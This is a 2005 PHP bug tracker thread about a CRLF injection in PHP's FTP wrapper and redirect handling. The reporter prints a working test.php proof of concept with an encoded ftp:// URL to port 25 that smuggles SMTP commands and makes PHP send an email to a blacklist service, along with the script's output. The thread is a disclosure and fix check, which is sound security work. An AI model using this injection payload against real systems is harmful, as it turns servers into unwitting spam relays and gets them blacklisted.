ID: 32936 User updated by: herbert dot groot dot jebbink at gmail dot com Reported By: herbert dot groot dot jebbink at gmail dot com Status: Closed Bug Type: FTP related Operating System: Linux PHP Version: 5.0.4 Assigned To: pollita New Comment:
I did test both ways before sending my previous comment, PHP stops now a 302 redirect, but the direct FTP way still results in sending a email. (there is a warning "failed to open stream: Operation now in progress" but the email is send) linux:/home/hgj # cat test.php <?php $http = 'http://dividedsky.net/gfx/badges' ; $ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A&lt;&gt;%0D%0ARCPT%20TO%3A&lt;listme%40listme.dsbl.org&gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/'; $check = getimagesize($http); $check = file_get_contents($ftp); ?> linux:/home/hgj # /usr/local/bin/php --version PHP 5.0.5-dev (cgi) (built: May 6 2005 20:58:59) Copyright (c) 1997-2004 The PHP Group Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend Technologies linux:/home/hgj # /usr/local/bin/php test.php Content-type: text/html X-Powered-By: PHP/5.0.5-dev <br /> <b>Warning</b>: getimagesize(http://dividedsky.net/gfx/badges) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Invalid redirect url! ftp://foo%0D%0AMAIL%20FROM%3A&lt;&gt;%0D%0ARCPT%20TO%3A&lt;listme%40listme.dsbl.org&gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AkeiEBtjqp2q0dV13uGVlTPl8xWpobZPF%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/ in <b>/home/hgj/test.php</b> on line <b>6</b><br /> <br /> <b>Warning</b>: file_get_contents(ftp://[EMAIL PROTECTED]:25/) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Operation now in progress in <b>/home/hgj/test.php</b> on line <b>7</b><br /> After a minute or so you can see the result at the dsbl.org website :-) In my case it it is the below url: http://dsbl.org/listing?82.197.205.88 Previous Comments: ------------------------------------------------------------------------ [2005-05-07 00:28:44] [EMAIL PROTECTED] the patch was applied in 2 places, the HTTP redirect handling and FTP wrapper. ------------------------------------------------------------------------ [2005-05-06 22:24:25] herbert dot groot dot jebbink at gmail dot com Thanks for the patch, however, IMHO the patch should not be applied in the HTTP wrapper to check a redirect but in the FTP wrapper. That way it will also work in the below situation, where PHP is still tricked to send a mail. $ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A&lt;&gt;%0D%0ARCPT%20TO%3A&lt;listme%40listme.dsbl.org&gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/'; $check = file_get_contents($ftp); ------------------------------------------------------------------------ [2005-05-06 04:24:29] [EMAIL PROTECTED] This bug has been fixed in CVS. Snapshots of the sources are packaged every three hours; this change will be in the next snapshot. You can grab the snapshot at http://snaps.php.net/. Thank you for the report, and for helping us make PHP better. ------------------------------------------------------------------------ [2005-05-05 12:18:16] herbert dot groot dot jebbink at gmail dot com "Interresting" was not the word that I used when I found out that my server was blacklisted as a spam machine and my emails where rejected by many mailservers. My bot that is written in PHP was trapped in the given exploit. ------------------------------------------------------------------------ [2005-05-05 04:42:41] [EMAIL PROTECTED] Interresting... ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/32936 -- Edit this bug report at http://bugs.php.net/?id=32936&edit=1
